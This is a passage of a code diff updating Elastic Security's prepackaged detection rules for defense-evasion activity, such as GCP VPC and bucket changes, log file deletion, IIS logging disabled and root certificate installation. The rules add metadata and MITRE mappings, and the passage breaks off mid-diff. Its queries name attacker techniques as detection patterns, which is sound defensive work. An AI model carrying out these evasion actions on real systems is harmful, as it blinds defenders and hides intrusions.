a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_configuration_modified.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Storage Bucket Configuration Modification", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:\"storage.buckets.update\" and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:\"storage.buckets.update\" and event.outcome:success\n", "references": [ "https://cloud.google.com/storage/docs/key-terms#buckets" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "97359fd8-757d-4b1d-9af1-ef29e4a8680e", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -27,9 +51,27 @@ "GCP", "Continuous Monitoring", "SecOps", - "Identity and Access" + "Identity and Access", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1578", + "name": "Modify Cloud Compute Infrastructure", + "reference": "https://attack.mitre.org/techniques/T1578/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json index c0a3c90853d79..a5a270795266a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_storage_bucket_permissions_modified.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Storage Bucket Permissions Modification", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:\"storage.setIamPermissions\" and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:\"storage.setIamPermissions\" and event.outcome:success\n", "references": [ "https://cloud.google.com/storage/docs/access-control/iam-permissions" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2326d1b2-9acf-4dee-bd21-867ea7378b4d", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_network_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_network_deleted.json new file mode 100644 index 0000000000000..317d75f88db0d --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_network_deleted.json @@ -0,0 +1,84 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies when a Virtual Private Cloud (VPC) network is deleted in Google Cloud Platform (GCP). A VPC network is a virtual version of a physical network within a GCP project. Each VPC network has its own subnets, routes, and firewall, as well as other elements. An adversary may delete a VPC network in order to disrupt their target's network and business operations.", + "false_positives": [ + "Virtual Private Cloud networks may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "index": [ + "filebeat-*", + "logs-gcp*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GCP Virtual Private Cloud Network Deletion", + "note": "", + "query": "event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.outcome:success\n", + "references": [ + "https://cloud.google.com/vpc/docs/vpc" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c58c3081-2e1d-4497-8491-e73a45d1a6d6", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "GCP", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_created.json new file mode 100644 index 0000000000000..70bb5d35cca68 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_created.json @@ -0,0 +1,80 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies when a virtual private cloud (VPC) route is created in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may create a route in order to impact the flow of network traffic in their target's cloud environment.", + "false_positives": [ + "Virtual Private Cloud routes may be created by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "index": [ + "filebeat-*", + "logs-gcp*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GCP Virtual Private Cloud Route Creation", + "note": "", + "query": "event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or \"beta.compute.routes.insert\")\n", + "references": [ + "https://cloud.google.com/vpc/docs/routes", + "https://cloud.google.com/vpc/docs/using-routes" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9180ffdf-f3d0-4db3-bf66-7a14bcff71b8", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Elastic", + "Cloud", + "GCP", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_deleted.json new file mode 100644 index 0000000000000..dbbf5367c0baf --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_gcp_virtual_private_cloud_route_deleted.json @@ -0,0 +1,85 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies when a Virtual Private Cloud (VPC) route is deleted in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may delete a route in order to impact the flow of network traffic in their target's cloud environment.", + "false_positives": [ + "Virtual Private Cloud routes may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "index": [ + "filebeat-*", + "logs-gcp*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GCP Virtual Private Cloud Route Deletion", + "note": "", + "query": "event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outcome:success\n", + "references": [ + "https://cloud.google.com/vpc/docs/routes", + "https://cloud.google.com/vpc/docs/using-routes" + ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a17bcc91-297b-459b-b5ce-bc7460d8f82a", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "GCP", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json index 343fa6ad88956..bfd280fc0defe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_guardduty_detector_deletion.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS GuardDuty Detector Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:guardduty.amazonaws.com and event.action:DeleteDetector and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/delete-detector.html", "https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "523116c0-d89d-4d7c-82c2-39e6845a78ef", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json index c4dfa95c5bc05..00e0973fd8cf1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_file_dir_tmp.json @@ -14,11 +14,34 @@ "language": "eql", "license": "Elastic License v2", "max_signals": 33, - "name": "Creation of Hidden Files and Directories", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\n process.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\n not process.name in (\"ls\", \"find\")\n", + "name": "Creation of Hidden Files and Directories via CommandLine", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\n process.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\n not process.name in (\"ls\", \"find\", \"grep\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_shared_object.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_shared_object.json new file mode 100644 index 0000000000000..b276a5afbcc17 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hidden_shared_object.json @@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Shared Object File", + "note": "", + "query": "file where event.action : \"creation\" and file.extension == \"so\" and file.name : \".*.so\" \n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json index 709464c4cbb05..7f9a63d67c0bc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_hide_encoded_executable_registry.json @@ -11,6 +11,13 @@ "license": "Elastic License v2", "name": "Encoded Executable Stored in the Registry", "query": "registry where\n/* update here with encoding combinations */\n registry.data.strings : \"TVqQAAMAAAAEAAAA*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + } + ], "risk_score": 47, "rule_id": "93c1ce76-494c-4f01-8167-35edfb52f7b1", "severity": "medium", @@ -45,5 +52,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json index 642d307c42ef2..e4cb6c0ecd532 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_iis_httplogging_disabled.json @@ -13,10 +13,38 @@ "license": "Elastic License v2", "max_signals": 33, "name": "IIS HTTP Logging Disabled", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"appcmd.exe\" or process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/dontLog*:*True\" and\n not process.parent.name : \"iissetup.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -51,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json index 43d662df271ee..f50a23003e940 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_injection_msbuild.json @@ -14,6 +14,18 @@ "license": "Elastic License v2", "name": "Process Injection by the Microsoft Build Engine", "query": "process.name:MSBuild.exe and event.action:\"CreateRemoteThread detected (rule: CreateRemoteThread)\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9", "severity": "low", @@ -58,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json index 3397db22f51f3..c163ca1ce8f77 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_install_root_certificate.json @@ -14,10 +14,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Install Root Certificate", - "query": "event.category:process and event.type:(start or process_started) and\n process.name:security and process.args:\"add-trusted-cert\"\n", + "query": "event.category:process and event.type:(start or process_started) and\n process.name:security and process.args:\"add-trusted-cert\" and\n not process.parent.executable:(\"/Library/Bitdefender/AVP/product/bin/BDCoreIssues\" or \"/Applications/Bitdefender/SecurityNetworkInstallerApp.app/Contents/MacOS/SecurityNetworkInstallerApp\"\n)\n", "references": [ "https://ss64.com/osx/security-cert.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bc1eeacf-2972-434f-b782-3a532b100d67", "severity": "medium", @@ -54,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json index 72ef939fd2c1c..360cb8235f570 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_installutil_beacon.json @@ -13,6 +13,28 @@ "license": "Elastic License v2", "name": "InstallUtil Process Making Network Connections", "query": "/* the benefit of doing this as an eql sequence vs kql is this will limit to alerting only on the first network connection */\n\nsequence by process.entity_id\n [process where event.type in (\"start\", \"process_started\") and process.name : \"installutil.exe\"]\n [network where process.name : \"installutil.exe\" and network.direction : (\"outgoing\", \"egress\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a13167f1-eec2-4015-9631-1fee60406dcf", "severity": "medium", @@ -34,7 +56,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -48,5 +70,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json index 35c0cb2fb2645..b9d551d4ed320 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kernel_module_removal.json @@ -18,6 +18,23 @@ "references": [ "http://man7.org/linux/man-pages/man8/modprobe.8.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef", "severity": "high", @@ -76,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json index 54ca81401c213..f2f6e8184614d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_kubernetes_events_deleted.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Kubernetes Events Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8b64d36a-1307-4b2e-a77b-a0027e4d27c8", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json index afaa771c5e752..dbc96fd9ee17c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_log_files_deleted.json @@ -11,13 +11,31 @@ "language": "eql", "license": "Elastic License v2", "name": "System Log File Deletion", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type == \"deletion\" and \n file.path : \n (\n \"/var/run/utmp\", \n \"/var/log/wtmp\", \n \"/var/log/btmp\", \n \"/var/log/lastlog\", \n \"/var/log/faillog\",\n \"/var/log/syslog\", \n \"/var/log/messages\", \n \"/var/log/secure\", \n \"/var/log/auth.log\"\n )\n", + "note": "", + "query": "file where event.type == \"deletion\" and\n file.path :\n (\n \"/var/run/utmp\",\n \"/var/log/wtmp\",\n \"/var/log/btmp\",\n \"/var/log/lastlog\",\n \"/var/log/faillog\",\n \"/var/log/syslog\",\n \"/var/log/messages\",\n \"/var/log/secure\",\n \"/var/log/auth.log\"\n ) and\n not process.name : (\"gzip\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -45,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json index c19475e4c05f2..45767c200381d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json +++ 